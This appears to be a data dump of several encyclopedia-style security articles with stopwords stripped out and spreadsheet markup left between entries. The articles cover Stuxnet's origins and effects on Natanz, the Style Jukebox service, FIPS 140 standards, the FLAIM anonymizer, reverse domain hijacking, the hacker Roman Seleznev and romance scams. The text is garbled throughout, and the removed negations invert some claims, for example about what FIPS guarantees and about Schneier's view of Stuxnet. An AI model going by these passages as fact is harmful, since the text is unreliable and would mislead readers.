(icsjwg), provides training, publishes recommended practices, provides self-assessment tool. part department homeland security plan improve american computer security, 2008 idaho national laboratory (inl) worked siemens identify security holes company's widely used process control system (pcs software step july 2008, siemens publicly announced flaws control system chicago conference; stuxnet exploited holes 2009.several industry organizations professional societies published standards best practice guidelines providing direction guidance control system end-users establish control system security management program. basic premise documents share prevention requires multi-layered approach, often termed defense depth. layers include policies procedures, awareness training, network segmentation, access control measures, physical security measures, system hardening, e.g., patch management, system monitoring, anti-virus intrusion prevention system (ips). standards best practices also recommend starting risk analysis control system security assessment. target origin experts believe stuxnet required largest costliest development effort malware history. developing many abilities would required team highly capable programmers, in-depth knowledge industrial processes, interest attacking industrial infrastructure. eric byres, years experience maintaining troubleshooting siemens systems, told wired writing code would taken many man-months, man-years. symantec estimates group developing stuxnet would consisted five thirty people, would taken months prepare. guardian, york times claimed (unnamed) experts studying stuxnet believe complexity code indicates nation-state would abilities produce self-destruct safeguards within code implied western government responsible, least responsible development. however, software security expert bruce schneier initially condemned 2010 news coverage stuxnet hype, stating almost entirely based speculation. subsequent research, schneier stated 2012 conclusively link stuxnet centrifuge structure natanz nuclear enrichment iran". iran target ralph langner, researcher identified stuxnet infected plcs, first speculated publicly september 2010 malware israeli origin, targeted iranian nuclear facilities. however langner recently, conference, recorded february 2011, stated that, opinion mossad involved, leading force israel. leading force behind stuxnet cyber superpower one; that's united states." kevin hogan, senior director security response symantec, reported infected systems iran (about 60%), speculation deliberately targeting "high-value infrastructure" iran including either bushehr nuclear power plant natanz nuclear facility. langner called malware one-shot weapon" said intended target probably hit, although admitted speculation. another german researcher spokesman german-based chaos computer club, frank rieger, first speculate natanz target. natanz nuclear facilities according israeli newspaper haaretz, september 2010 experts iran computer security specialists increasingly convinced stuxnet meant sabotage uranium enrichment facility natanz centrifuge operational capacity dropped past year percent." november 2010 announced uranium enrichment natanz ceased several times series major technical problems. "serious nuclear accident" (supposedly shutdown centrifuges) occurred site first half 2009, speculated forced gholam reza aghazadeh, head atomic energy organization iran (aeoi) resign. statistics published federation american scientists (fas) show number enrichment centrifuges operational iran mysteriously declined 4,700 3,900 beginning around time nuclear incident wikileaks mentioned would occurred. institute science international security (isis) suggests, report published december 2010, stuxnet reasonable explanation apparent damage natanz, destroyed 1,000 centrifuges percent) sometime november 2009 late january 2010. authors conclude: attacks seem designed force change centrifuge’s rotor speed, first raising speed lowering likely intention inducing excessive vibrations distortions would destroy centrifuge. goal quickly destroy centrifuges [fuel enrichment plant], stuxnet failed. goal destroy limited number centrifuges back iran’s progress operating fep, making detection difficult, succeeded, least temporarily. isis report notes iranian authorities attempted conceal breakdown installing centrifuges large scale.the worm worked first causing infected iranian ir-1 centrifuge increase normal operating speed 1,064 hertz 1,410 hertz minutes returning normal frequency. twenty-seven days later, worm went back action, slowing infected centrifuges hundred hertz full minutes. stresses excessive, slower, speeds caused aluminium centrifugal tubes expand, often forcing parts centrifuges sufficient contact destroy machine.according washington post, international atomic energy agency (iaea) cameras installed natanz facility recorded sudden dismantling removal approximately 900–1,000 centrifuges time stuxnet worm reportedly active plant. iranian technicians, however, able quickly replace centrifuges report concluded uranium enrichment likely briefly disrupted.on february 2011, institute science international security released report concluding that: assuming iran exercises caution, stuxnet unlikely destroy centrifuges natanz plant. iran likely cleaned malware control systems. prevent re-infection, iran exercise special caution since many computers iran contain stuxnet. although stuxnet appears designed destroy centrifuges natanz facility, destruction means total. moreover, stuxnet lower production enriched uranium (leu) 2010. quantities could certainly greater, stuxnet could important part reason increase significantly. nonetheless, remain important questions stuxnet destroyed 1,000 centrifuges. observation harder destroy centrifuges cyber attacks often believed. iranian reaction associated press reported semi-official iranian students news agency released statement september 2010 stating experts atomic energy organization iran previous week discuss stuxnet could removed systems. according analysts, david albright, western intelligence agencies attempting sabotage iranian nuclear program time.the head bushehr nuclear power plant told reuters personal computers staff plant infected stuxnet state-run newspaper iran daily quoted reza taghipour, iran's telecommunications minister, saying caused "serious damage government systems". director information technology council iranian ministry industries mines, mahmud liaii, said that: electronic launched iran... this computer worm designed transfer data production lines industrial plants locations outside iran."in response infection, iran assembled team combat with 30,000 addresses affected iran, official said infection fast spreading iran problem compounded ability stuxnet mutate. iran systems clean infections advised using siemens scada antivirus since suspected antivirus contains embedded code updates stuxnet instead removing it.according hamid alipour, deputy head iran's government information technology company, "the attack still ongoing versions virus spreading." reported company begun cleanup process iran's "sensitive centres organizations." anticipated could root virus within months, virus stable, since started cleanup process three versions spreading", told islamic republic news agency september 2010.on november 2010, iranian president mahmoud ahmadinejad stated first time computer virus caused problems controller handling centrifuges natanz facilities. according reuters, told reporters news conference tehran, "they succeeded creating problems limited number centrifuges software installed electronic parts."on iranian nuclear scientists targeted separate, nearly simultaneous bomb attacks near shahid beheshti university tehran. majid shahriari, quantum physicist killed. fereydoon abbasi, high-ranking official ministry defense seriously wounded. wired speculated assassinations could indicate whoever behind stuxnet felt sufficient stop nuclear program. that wired article suggested iranian government could behind assassinations. january 2010, another iranian nuclear scientist, physics professor tehran university, killed similar bomb explosion. january 2012, director natanz nuclear enrichment facility, mostafa ahmadi roshan, killed attack quite similar killed shahriari.an analysis demonstrates iran's enrichment capacity grew 2010. study indicated iran's centrifuges appeared performing better previous year, would significantly reduce tehran's time produce bomb-grade uranium. report reviewed official iaea affirmed study.european officials, along private experts told reuters iranian engineers successful neutralizing purging stuxnet country's nuclear machinery.given growth iranian enrichment ability 2010, country intentionally misinformation cause stuxnet's creators believe worm successful disabling iranian nuclear program actually was. israel israel, unit 8200, speculated country behind stuxnet many media reports experts richard falkenrath, former senior director policy plans within office homeland security. yossi melman, covers intelligence israeli newspaper haaretz wrote book israeli intelligence, also suspected israel involved, noting meir dagan, former 2011) head national intelligence agency mossad, term extended 2009 said involved important projects. additionally, 2010 israel grew expect iran would nuclear weapon 2014 2015 least three years later earlier estimates without need israeli military attack iranian nuclear facilities; "they seem know something, time originally thought", added. israel publicly commented stuxnet attack 2010 confirmed cyberwarfare among pillars defense doctrine, military intelligence unit pursue defensive offensive options. when questioned whether israel behind virus fall 2010, israeli officials broke "wide smiles", fueling speculation government israel involved genesis. american presidential advisor gary samore also smiled stuxnet mentioned, although american officials suggested virus originated abroad. according telegraph, israeli newspaper haaretz reported video celebrating operational successes gabi ashkenazi, retiring israel defense forces (idf) chief staff, shown retirement party included references stuxnet, thus strengthening claims israel's security forces responsible.in 2009, year stuxnet discovered, scott borg united states cyber-consequences unit (us-ccu) suggested israel prefer mount cyber-attack rather military strike iran's nuclear facilities. and, late 2010 borg stated, "israel certainly ability create stuxnet little downside attack would virtually impossible prove tool like stuxnet israel's obvious weapon choice." iran uses centrifuges natanz, design khan stole 1976 took pakistan. black market nuclear-proliferation network sold p-1s among customers, iran. experts believe israel also somehow acquired p-1s tested stuxnet centrifuges, installed dimona facility part nuclear program. equipment united states, received p-1s libya's former nuclear program.some also cited several clues code concealed reference word myrtus, believed refer latin name myrtus myrtle tree, hebrew called hadassah. hadassah birth name former jewish queen persia, queen esther. however, "myrtus" reference simply misinterpreted reference scada components known rtus (remote terminal units) reference actually rtus"–a management feature scada. also, number 19790509 appears code refer date 1979 habib elghanian, persian jew, executed tehran. another date appears code september 2007", iran's president mahmoud ahmadinejad spoke columbia university made comments questioning validity holocaust. such data conclusive, since, noted symantec, "...attackers would natural desire implicate another party". united states there also testimony involvement united states collaboration israel, report stating "there vanishingly little doubt [it] played role creating worm." reported united states, secret programs, initiated bush administration accelerated obama administration, sought destroy iran's nuclear program novel methods undermining iranian computer systems. diplomatic cable obtained wikileaks showed united states advised target iran's nuclear abilities 'covert sabotage'. article york times january 2009 credited then-unspecified program preventing israeli military attack iran efforts focused ways destabilize centrifuges. wired article claimed stuxnet believed created united states". dutch historian peter koop speculated tailored access operations could developed stuxnet, possibly collaboration israel.the fact john bumgarner, former intelligence officer member united states cyber-consequences unit (us-ccu), published article prior stuxnet discovered deciphered, outlined strategic cyber strike centrifuges suggests cyber attacks permissible nation states operating uranium enrichment programs violate international treaties gives credibility claims. bumgarner pointed centrifuges used process fuel nuclear weapons target cybertage operations made destroy manipulating rotational speeds.in march 2012 interview minutes, retired force general michael hayden served director central intelligence agency national security agency denying knowledge created stuxnet said believed good idea" carried downside legitimized sophisticated cyber weapons designed cause physical damage. hayden said, "there take look this... maybe even attempt turn purposes". report, sean mcgurk, former cybersecurity official department homeland security noted stuxnet source code could downloaded online modified directed target systems. speaking stuxnet creators, said, "they opened box. they demonstrated capability... it's something back." joint effort states targets april 2011, iranian government official gholam reza jalali stated investigation concluded united states israel behind stuxnet attack. frank rieger stated three european countries' intelligence agencies agreed stuxnet joint united states-israel effort. code windows injector payload differ style, likely implying collaboration. other experts believe us-israel cooperation unlikely "the level trust countries' intelligence military establishments high."a wired magazine article general keith alexander stated: "and cyber warriors already launched first attack. cyber weapon came known stuxnet created built partnership israeli intelligence mid-2000s."china, jordan, france possibilities, siemens also participated. langner speculated infection spread drives belonging russian contractors since iranian targets accessible internet. 2019, reported iranian mole working dutch intelligence behest israel inserted stuxnet virus flash drive convinced another person working natanz facility so.sandro gaycken free university berlin argued attack iran ruse distract stuxnet's real purpose. according him, broad dissemination 100,000 industrial plants worldwide suggests field test cyber weapon different security cultures, testing preparedness, resilience, reactions, highly valuable information cyberwar unit.the united kingdom denied involvement worm's creation.stratfor documents released wikileaks suggest international security firm 'stratfor' believe israel behind stuxnet "but can't assume stuxnet capable blast well".in july 2013, edward snowden claimed stuxnet cooperatively developed united states israel. deployment north korea according report reuters, also tried sabotage north korea's nuclear program using version stuxnet. operation reportedly launched tandem attack targeted iranian centrifuges 2009–10. north korean nuclear program shares many similarities iranian, developed technology transferred pakistani nuclear scientist a.q. khan. effort failed, however, north korea's extreme secrecy isolation made impossible introduce stuxnet nuclear facility. stuxnet cyberattack 2018, gholamreza jalali, iran's chief national passive defence organisation (npdo), claimed country fended stuxnet-like attack targeting country's telecom infrastructure. iran's telecommunications minister mohammad-javad azari jahromi since accused israel orchestrating attack. iran plans israel international court justice (icj) also willing launch retaliation attack israel desist. related malware "stuxnet's secret twin" november 2013 article foreign policy magazine claims existence earlier, much sophisticated attack centrifuge complex natanz, focused increasing centrifuge failure rate long time period stealthily inducing uranium hexafluoride overpressure incidents. this malware capable spreading physically installed, probably previously contaminated field equipment used contractors working siemens control systems within complex. clear whether attack attempt successful, followed different, simpler conventional attack indicative. duqu september 2011, worm found, thought related stuxnet. laboratory cryptography system security (crysys) budapest university technology economics analyzed malware, naming threat duqu. symantec, based report, continued analysis threat, calling "nearly identical stuxnet, completely different purpose", published detailed technical paper. main component used duqu designed capture information keystrokes system information. exfiltrated data used enable future stuxnet-like attack. december 2011, kaspersky lab's director global research analysis spoke reuters recent research results showing platform stuxnet duqu originated 2007, referred tilded beginning file names. also uncovered research possibility three variants based tilded platform. flame 2012, malware "flame" found, thought related stuxnet. researchers named program "flame" name modules. after analysing code flame, kaspersky said strong relationship flame stuxnet. early version stuxnet contained code propagate infections drives nearly identical flame module exploits vulnerability. targeting military command, control, communications intelligence former u.s. secretary defense william perry collina, director policy ploughshares fund, wrote thousand maybe millions attacks u.s. military's internet similar dod-only communications. cybersecurity attack nuclear-weapon state u.s. israel reportedly iran stuxnet, could convince leaders country attacked nuclear weapons weren't. this could lead start nuclear mistake, believing could lose ability respond appropriately waited information.if country targeted cybersecurity attack india pakistan, resulting nuclear would likely produce nuclear autumn roughly quarter humanity, directly impacted nuclear explosions, could starve death something else sooner. united states, russia china maybe even united kingdom france) experienced cybersecurity attack, resulting nuclear would likely produce nuclear winter, percent humanity would starvation succumb something else sooner.perry collina also noted nuclear accident much likely russia launching first strike united states. they claimed world's major nuclear arsenals focusing wrong problem. they cited several sources support claim including study found many advanced weapon systems u.s. commercial free software without changing default passwords. hackers working able penetrate systems undetected part using default passwords found internet. media coverage since 2010, extensive international media coverage stuxnet aftermath. early commentary, economist pointed stuxnet kind cyber-attack." july 2011, wired published article detailing network security experts able decipher origins stuxnet. piece, zetter claimed stuxnet's "cost–benefit ratio still question." later commentators tended focus strategic significance stuxnet cyber weapon. following wired piece, holger stark called stuxnet "first digital weapon geopolitical importance, could change wars fought." meanwhile, eddie walsh referred stuxnet "the world's newest high-end asymmetric threat." ultimately, claim "extensive media coverage afforded stuxnet served advertisement vulnerabilities used various cybercriminal groups." while case, media coverage also increased awareness cyber security threats. alex gibney's 2016 documentary zero days covers phenomenon around stuxnet. zero-day (also known 0-day) vulnerability computer-software vulnerability unknown unaddressed interested mitigating vulnerability (including vendor target software). until vulnerability mitigated, hackers exploit adversely affect computer programs, data, additional computers network. 2016, revealed general james cartwright, former head u.s. strategic command, leaked information related stuxnet. later plead guilty lying agents pursuing investigation leak. january 2017, g</t>
  </si>
  <si>
    <t>Style Jukebox</t>
  </si>
  <si>
    <t>style jukebox hi-fi high-resolution audio cloud music streaming storage player windows, ios, android windows phone platforms. player also available mac, windows linux.style jukebox allowed users upload personal music collection computer style jukebox servers listen another compatible device (android, ios, windows, mac, windows phone) streaming downloading songs offline playback. basic accounts storage. accounts could music.as july 2016, style jukebox 250,000 registered users.on december 2017, style jukebox discontinued service small post home page, details released. features native music applications windows, ios, android windows phone. automatic import dropbox, onedrive google drive available web, windows, windows phone special upload native software available macs store music user stream music playlist cellular data/ wifi reduce data plan downloading song phone. selective download support popular music file formats: mp3, aac, wma, ogc, lossless flac, aiff, ape, alac (alac) file size audio quality 24bit/192khz/7.1 surround browse music songs, albums, artists, genres composers. edit song title, album title, artist name genre style jukebox windows style jukebox player. support lossless audio playback chromecast (google cast) technology style jukebox consisted cloud-based services user management, music storage programmatic interfaces (apis); clients music streaming storage desktop mobile operating systems. upload available desktop client only; style jukebox enabled users drop music files folders music player automatically uploaded synced style jukebox cloud-based services made available user's computers devices also style jukebox client installed.style jukebox cloud-based services automatically transcoded formats match device's supported formats. example, 320kbit/s transcoded 320kbit/s devices flac lossless transcoded lossless windows phone devices. references</t>
  </si>
  <si>
    <t>FIPS 140</t>
  </si>
  <si>
    <t>series federal information processing standards (fips) u.s. government computer security standards specify requirements cryptography modules. october 2020, fips 140-2 fips 140-3 accepted current active. fips 140-3 approved march 2019 successor fips 140-2 became effective september 2019. fips 140-3 testing began september 2020, although fips 140-3 validation certificates issued yet. fips 140-2 testing still available september 2021 (later changed applications already progress april 2022), creating overlapping transition period year. fips 140-2 test reports remain cmvp queue still granted validations date, fips 140-2 validations moved historical list september 2026 regardless actual final validation date. purpose fips national institute standards technology (nist) issues publication series coordinate requirements standards cryptographic modules include hardware software components departments agencies united states federal government. fips purport provide sufficient conditions guarantee module conforming requirements secure, still less system built using modules secure. requirements cover cryptographic modules also documentation highest security level) aspects comments contained source code. user agencies desiring implement cryptographic modules confirm module using covered existing validation certificate. fips 140-1 fips 140-2 validation certificates specify exact module name, hardware, software, firmware, and/or applet version numbers. levels higher, operating platform upon validation applicable also listed. vendors always maintain baseline validations. cryptographic module validation program (cmvp) operated jointly united states government's national institute standards technology (nist) computer security division communications security establishment (cse) government canada. validated cryptographic modules required united states government unclassified uses cryptography. government canada also recommends fips validated cryptographic modules unclassified applications departments. security levels fips 140-2 defines four levels security, simply named "level "level specify detail level security required particular application. fips 140-2 level lowest, imposes limited requirements; loosely, components must "production-grade" various egregious kinds insecurity must absent. fips 140-2 level adds requirements physical tamper-evidence role-based authentication. fips 140-2 level adds requirements physical tamper-resistance (making difficult attackers gain access sensitive information contained module) identity-based authentication, physical logical separation interfaces "critical security parameters" enter leave module, interfaces. fips 140-2 level makes physical security requirements stringent, requires robustness environmental attacks.in addition specified levels, section 4.1.1 specification describes additional attacks require mitigation, differential power analysis. product contains countermeasures attacks, must documented tested, protections required achieve given level. thus, criticism fips 140-2 standard gives false sense security levels standard implies modules tamper-evident and/or tamper-resistant, modules permitted side channel vulnerabilities allow simple extraction keys. scope requirements fips imposes requirements eleven different areas: cryptographic module specification (what must documented) cryptographic module ports interfaces (what information flows out, must segregated) roles, services authentication (who module, checked) finite state model (documentation high-level states module transitions occur) physical security (tamper evidence resistance, robustness extreme environmental conditions) operational environment (what sort operating system module uses used cryptographic management (generation, entry, output, storage destruction keys) emi/emc self-tests (what must tested when, must done test fails) design assurance (what documentation must provided demonstrate module well designed implemented) mitigation attacks module designed mitigate against, say, tempest attacks documentation must how) brief history fips 140-1, issued january 1994 withdrawn 2002, developed government industry working group, composed vendors users cryptographic equipment. group identified four "security levels" eleven "requirement areas" listed above, specified requirements area level. fips 140-2, issued 2001, takes account changes available technology official standards since 1994, comments received vendor, tester, user communities. main input document international standard iso/iec 19790:2006 security requirements cryptographic modules issued march 2006. nist issued special publication 800-29 outlining significant changes fips 140-1 fips 140-2.fips 140-3, issued march 2019 announced 2019 currently overlapping transition period supersede fips 140-2 aligns nist guidance around international standards documents: iso/iec 19790:2012(e) information technology security techniques security requirements cryptographic modules iso/iec 24759:2017(e) information technology security techniques test requirements cryptographic modules. first draft version fips 140-3 standard, nist introduced software security section, additional level assurance (level simple power analysis (spa) differential power analysis (dpa) requirements. draft issued 2009, however, reverted four security levels limits security levels software levels criticism validation process software vendor required re-validate fips-validated module every change, matter small, software; re-validation required even obvious security fixes. since validation expensive process, gives software vendors incentive postpone changes software result software receive security updates next validation. result validated software less safe non-validated equivalent.this criticism countered recently industry experts instead responsibility vendor narrow validation boundary. re-validation efforts triggered bugs security fixes outside core cryptographic operations, properly scoped validation subject common re-validation described. also common criteria fips 140-2 fips 140-3 category: computer security standards category: cryptography standards references external links "federal information processing standards (fips) publications". nist. 2013-02-05. retrieved 2013-05-18. "validated fips 140-1 fips 140-2 cryptographic modules". nist. 2013-05-17. archived original 2014-12-26. retrieved 2013-05-18.</t>
  </si>
  <si>
    <t>Technical protection measure</t>
  </si>
  <si>
    <t>FLAIM</t>
  </si>
  <si>
    <t>flaim (framework anonymization information management) modular tool designed allow computer network sharing application complex data sanitization policies.flaim aimed different user communities. first, flaim used security engineer investigating broad incident spanning multiple organizations. because sensitivity inherent security relevant logs, many organizations reluctant share them. however, reluctance inhibits sharing necessary investigate intrusions commonly span organizational boundaries. second, anyone designing analysis computer forensics tools needs data test tools. larger diverse data set, robust make tools. many, means must gather many logs outside sources, generate in-house. again, requires sharing. third, researchers many computer science disciplines (e.g., network measurements, computer security, etc.) need large diverse data sets study. having data sanitization tools available makes organizations willing share researchers logs. flaim available open source initiative approved university illinois/ncsa open source license. this bsd-style license. runs unix unix-like systems, including linux, freebsd, netbsd, openbsd while flaim anonymizer, unique flexibility create complex policies support multiple types. more specifically, tool meet following goals. flaim provides diverse anonymization primitives. flaim supports multiple type, including linux process accounting logs, netfilter alerts, tcpdump traces nfdump netflows. with flexible anonymization policy language, complex policies make trade-offs information loss security made. flaim modular easily extensible types logs data. anonymization engine agnostic syntax actual log. history work anonymization began 2004 ncsa. first anonymizing logs in-house share sift group. soon need powerful anonymization anonymization different types logs. canine created anonymize convert multiple formats netflows. this java gui-based tool. later, scrub-pa created anonymize process accounting logs. scrub-pa based java code used canine. development tools funded office naval research ncassr research center slagel project.it quickly realized building one-off tools format also, earlier tools limited could scripted command line. decided new, modular command line-based unix tool needed. because speed also concern, tool need written c++. with successful acquisition cyber trust grant national science foundation, laim working group formed ncsa. from project headed adam slagell, flaim developed overcome limitations canine scrub-pa. first public version flaim, 0.4., released july 2006. features flexible policy language modular support simple plugins types support major unix-like operating systems built-in support several anonymization primitives plugin nfdump format netflows plugin netfilter firewall logs plugin pcap traces form tcpdump plugin linux process accounting logs references luo, slagell, yurcik, "canine: netflow converter/anonymizer tool format interoperability secure sharing," flocon network flow analysis conference, pittsburgh, sep., 2005. external links official flaim home page laim working group official home usenix lisa paper flaim crawdad entry flaim dartmouth</t>
  </si>
  <si>
    <t>user, file, attack, secur, servic, softwar, password, compani, state, includ</t>
  </si>
  <si>
    <t>Reverse domain hijacking</t>
  </si>
  <si>
    <t>reverse domain name hijacking (also known reverse cybersquatting commonly abbreviated 'rdnh'), occurs rightful trademark owner attempts secure domain name making cybersquatting claims domain name’s "cybersquatter" owner. this often intimidates domain name owners transferring ownership domain names trademark owners avoid legal action, particularly domain names belong smaller organizations individuals. reverse domain name hijacking commonly enacted larger corporations famous individuals, defense rightful trademark prevent libel slander.reverse domain name "hijacking" legal remedy counter practice domain squatting, wherein individuals hold many registered domain names containing famous third party trademarks intent profiting selling domain names back trademark owners. trademark owners initially responded filing cybersquatting lawsuits registrants enforce trademark rights. however, number cybersquatting incidents grew, trademark owners noticed registrants would often settle cases rather litigate. cybersquatting lawsuits defensive strategy combat cybersquatting, however lawsuits also used strongarming innocent domain name registrants giving domain names trademark owner not, fact, entitled udrp restrictions reverse domain name hijacking paragraph 15(e) udrp rules defines reverse domain name hijacking filing complaint faith, resulting abuse udrp administrative process. becomes difficult objectively quantify constitutes subjective “bad faith,” resulting panels often viewing parties’ factual discrepancies indeterminable immaterial best. therefore, despite express recognition udrp, reverse domain name hijacking findings rare based heavily factual circumstances surrounding case.circumstances cited wipo panels justification finding reverse domain name hijacking includes: when registration domain predates trademark rights complainant. when complaint provided evidence faith registration directed towards complainant. where complainant used udrp plan option attempt secure domain commercial negotiations broken off. where complainant attempted deceive domain owner makes misrepresentations fails disclose material information panel.examples findings include following wipo cases: paul ronpaul.org (2013), webpass, inc. paul breitenbach (2010), urban logic, inc. urban logic, peter holland (2009), david robinson brendan (2008), decal gregory ricks (2008), hero heroic sandwich (2008), poker host inc. russ “dutch” boyd (2008), fomento construcciones contratas “fcc.com” (2007), liquid nutrition liquidnutrition.com (2007), rohl, rohl (2006), majesty queen (elizabeth virtual countries, inc., deutsche welle diamondware (2000). list hundred reverse domain name hijacking decisions available rdnh.com.although udrp panelists currently tools punish abuses reverse domain name hijacking, finding might used local jurisdiction abuses might constitute tort tortious interference contract unfair business practice. acpa restrictions reverse domain name hijacking anticybersquatting consumer protection expressly recognize reverse domain name hijacking often limits defendants’ recovery retention transference domain name. also fails provide remedies victims attempted reverse cybersquatting. however, statute permits monetary relief faith, reckless disregard willful violation court order involved.similarly, 1975 amendment lanham gives courts discretion awarding reasonable attorneys’ fees prevailing party “exceptional” circumstances. attempting define “exceptional,” circuit courts split objectively constitutes malicious, fraudulent, deliberate misconduct. some courts award fees faith baseless litigation involved courts look economic coercion failure reference controlling law. nevertheless, inherent animosity arising sued, courts generally hold prevailing defendants higher level scrutiny, requiring vexatious harassing conduct shift attorney’s fees favor. implications neither udrp acpa provides much deterrent curb trademark owners’ abuse rights. abate reverse domain name hijacking practices, legal professionals believe congress enact laws specifically designed facilitate litigation reverse cybersquatters. similarly, advocates argue stronger penalties deter unlawful deprivation validly registered domain names, fines precluding offending trademark owners filing cybersquatting claims designated period time. references</t>
  </si>
  <si>
    <t>Roman Seleznev</t>
  </si>
  <si>
    <t>roman valerevich seleznev seleznyov, russian: роман валерьевич селезнёв; born 1984), also known hacker name track2, russian computer hacker. seleznev indicted united states 2011, convicted hacking servers steal credit-card data. activities estimated caused $169 million damages businesses financial institutions. seleznev arrested july 2014, sentenced years prison wire fraud, intentional damage protected computer, identity theft. early life seleznev valery seleznev, member russia's duma. hacking career began activities early 2003 credit card fraud site carderplanet, providing paid social security numbers criminal-history research using (among others) stolen lexisnexis accurint.com accounts. seleznev's employee later created scanner allowed user scan internet msrdp open ports (3389 default). default configurations provided poor protection time, many administrator accounts secured passwords. exploiting vulnerability, seleznev partner accessed many remote computers, including financial credit-card data. contacted badb, another hacker, gain experience exploiting financial systems. badb, cybercriminal identified 2009 vladislav horohorin, provided seleznev automated script look credit card traces systems networks. with script, seleznev obtained first credit-card dumps, resold horohorin. became dissatisfied horohorin, decided begin credit-card-dump operation using nickname ncux (from russian: псих, "psycho"). seleznev expanded operations 2008 scanning msrdp default passwords developing sophisticated malware could intercept network traffic search network shares, distributing flaws internet browsers injecting malicious code advertising traffic. infected many computers, primarily united states. 2009, usss believed collected enough information come conclusion ncux probably identity roman seleznev. they meeting russian intelligence agency shared information investigation belief ncux seleznev. shortly meeting, june 2009, ncux closed accounts disappeared internet; usss suspected tipped seleznev off.after shutting ncux, seleznev created names (track2 bulba) used operate automated stolen-credit-card shops. bought advertising space "dumps" section illegal carding forum carder.su, shut 2012 department homeland security operation. horohorin's advertising campaign carder.su also shut down, denial-of-service attack ensued. arrested usss august 2010, leaving seleznev without competition. during vacation morocco, seleznev received severe head injury 2011 marrakesh bombing evacuated moscow surgery. arrest trial seleznev's 2014 arrest controversial russia. russian officials called arrest "kidnapping", said u.s. failed notify russian consulates. initially refused disclose location seleznev's arrest, prosecutors later revealed arrested vacation kanifushi resort maldives. russian foreign ministry criticized island country failing follow "international legal norms", prosecutors said justified based noncooperation 2009 scope seleznev's crimes. maldives extradition treaty united states, usss negotiated directly maldivian government arrange expulsion seleznev u.s. enforcement custody, sent guam await trial.dhs secretary johnson said statement arrest showed "despite increasingly borderless nature transitional organized crime, long justice department homeland security continue disrupt dismantle sophisticated criminal organizations".in 2016, 1½-week trial u.s. district court western district washington, jury found seleznev guilty counts; following year, sentenced years' imprisonment. 2017, seleznev faced charges atlanta nevada; pled guilty september conspiracy commit bank fraud, sentenced years prison november. this sentence concurrently original sentence.later reporting indicated seleznev's arrest result cooperative effort u.s. government officer working within fsb.seleznev currently held medium security prison butner north carolina, transferred atlanta 2018. requested transferred butner prison's good living conditions hospital. notes references external links 17-30085 roman seleznev united states court appeals ninth circuit https://www.justice.gov/sites/default/files/usao-nv/legacy/2013/05/23/12-04%20indictment.pdf subject department justice</t>
  </si>
  <si>
    <t>Romance scam</t>
  </si>
  <si>
    <t>romance scam confidence trick involving feigning romantic intentions towards victim, gaining victim's affection, using goodwill victim send money scammer false pretenses commit fraud victim. fraudulent acts involve access victim's money, bank accounts, credit cards, passports, e-mail accounts, national identification numbers; forcing victims commit financial fraud behalf.these scams often perpetrated organized criminal gangs, work together take money multiple victims time.more money lost year romance scams similar internet scams, technical support scams. stolen images romance scammers create personal profiles using stolen photographs attractive people purpose asking others contact them. this often known catfishing. often photos unknown african actresses used lure victim believing talking person. military members also impersonated, pretending serve military explains scammer available in-person meeting. because scammers often look nothing like photos send victims, scammers rarely meet victims face face even video call. they deceive intended victims making plausible-sounding excuses unwillingness show faces, saying cannot meet temporarily traveling broken camera. tricking victim scammers adept knowing "play" victims sending love poems, games emails, building "loving relationship" many promises "one married". communications exchanged scammer victim period time scammer feels connected victim enough money. scammers prey victims' false sense relationship lure sending money. these requests money, airplane tickets visit victim, medical education expenses. there usually promise scammer join victim victim's home. victims invited travel scammer's country; cases victims arrive asked-for gift money family members bribes corrupt officials, beaten robbed murdered.the scam usually ends victim realizes scammed stops sending money. criminal groups criminal networks defraud lonely people around world false promises love romance. scammers post profiles dating websites, non-dating social media accounts, classified sites even online forums search victims. scammer usually attempts obtain private method communication, email phone number build trust victim.because scammers working groups, someone group online available send e-mail text messages victim hour. rotation different scammers, claiming person, difficult detect text-based messages, whereas would obvious different person showed face-to-face meeting video telephone call. scale 2016, federal bureau investigation received reports $220 million lost victims relationship scams. this approximately seven times stolen phishing scams almost times reported losses ransomware attacks. according statistics, crime alarming rise. monetary loss united states rose $211 million $475 million 2017 2019. number cases rose 15372 19473 years. according australia government, crime also rise australia. monetary loss australia rose $20.5 million $28.6 million 2017 2019. scamwatch, website australian competition consumer commission (accc), provides information recognise, avoid report scams. 2005, accc agencies formed australasian consumer fraud taskforce (acft). site provides information current scams, warning signs staying safe online. target demographics older people often targeted, likely assets, retirement funds homes, stolen.sensitive people vulnerable online dating scams, based study conducted british psychological society. results, sensitive less emotionally intelligent people likely vulnerable online dating scams. variations narratives used extract money victims romance scams include following: saying boss paid postal money orders, asks victim cash forged money orders wire money scammer. bank eventually reverts money order cash wire transfer. saying need victim send money passport. saying require money flights victim's country held back home country family member spouse. cases scammer never comes, instead says held immigration authorities demanding bribes. saying gold bars valuables seized customs need taxes recover items join victim country. saying need money join victim country, meeting online dating site. saying held failure bill. saying need money hospital bills. saying need money phone bills order continue communicating victim. saying need money parents' urgent medical treatment. saying need money complete education visit victim. offering job, often people poor country, payment registration fee. these particularly common african dating sites. scammer actually employed directly indirectly website, share victim's member usage fees passed scammer. blackmail some romance scammers seek victim obscure fetish make victim think scammer's plane ticket, live sexual fantasy scammer. other scammers like entice victims perform sexual acts webcam. they record victims, play back recorded images videos them, extort money prevent sending recordings friends, family, employers, often discovered social media sites facebook twitter. pro-daters pro-dater differs scams method operation: face-to-face meeting actually take place scammer's country sole purpose manipulating victim spending much money possible relatively little time, little nothing return. scheme usually involves accomplices, interpreter taxi driver, must paid victim inflated price. everything pre-arranged wealthy foreigner pays expensive accommodation, taken ordinary public café costly restaurant (usually out-of-the-way place priced locals would ever willing pay), manipulated making various expensive purchases, including gifts scammer electronics coats.the vendors also typically part scheme. after victim left, merchandise returned vendors pro-dater various accomplices take respective take. pro-dater eager date again, next date immediately next wealthy foreigner.the supposed relationship goes further, except inundate victim requests money return home. unlike gold digger, marries money, pro-dater necessarily single available real life. scams another variation romance scam scammer insists need marry order inherit millions dollars gold left father, uncle, grandfather. young woman contact victim tell plight: able remove gold country unable duty marriage taxes. woman unable inherit fortune gets married, marriage prerequisite father, uncle grandfather's will. scammer convinces victim sincere able build enough rapport thousands dollars help bring gold victim's country. scammer offer victim's country prove real person victim send money flight. however, scammer never arrives. victim contact scammer happened, scammer provide excuse able exit visa, illness, family member. impersonation military personnel rapidly growing technique scammers impersonate american military personnel. scammers prefer images, names profiles soldiers usually inspires confidence, trust admiration victims. military public relations often post information soldiers without mentioning families personal lives, images stolen websites organized internet crime gangs often operating nigeria ghana. these scammers tell victims lonely, supporting orphanage money, needing financial assistance cannot access money combat zone. money always sent third party collected scammer. sometimes third party real, sometimes fictitious. funds sent western union moneygram claimed showing identification sender sends money using secret pass phrase response. money picked anywhere world. some 